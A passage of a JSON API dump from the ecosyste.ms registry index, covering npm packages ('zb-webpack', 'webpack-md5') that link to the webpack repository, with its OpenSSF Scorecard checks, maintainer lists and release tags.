endilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/zb-webpack/codemeta","maintainers":[{"uuid":"itlboy","login":"itlboy","name":null,"email":"nkien.bk@gmail.com","url":null,"packages_count":3,"html_url":"https://www.npmjs.com/~itlboy","role":null,"created_at":"2022-11-15T14:35:22.782Z","updated_at":"2022-11-15T14:35:22.782Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/itlboy/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8578581,"name":"webpack-md5","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2023-11-16T17:41:11.009Z","latest_release_published_at":"2023-11-16T17:41:11.009Z","latest_release_number":"5.50.0","last_synced_at":"2026-09-03T00:18:48.350Z","created_at":"2023-11-16T20:38:34.861Z","updated_at":"2026-09-03T00:18:48.350Z","registry_url":"https://www.npmjs.com/package/webpack-md5","install_command":"npm install webpack-md5","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.50.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-15T12:07:17.000Z","size":95092,"stargazers_count":65979,"open_issues_count":146,"forks_count":9532,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.192Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-15T11:34:15.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36783737,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-19T02:00:06.185Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codel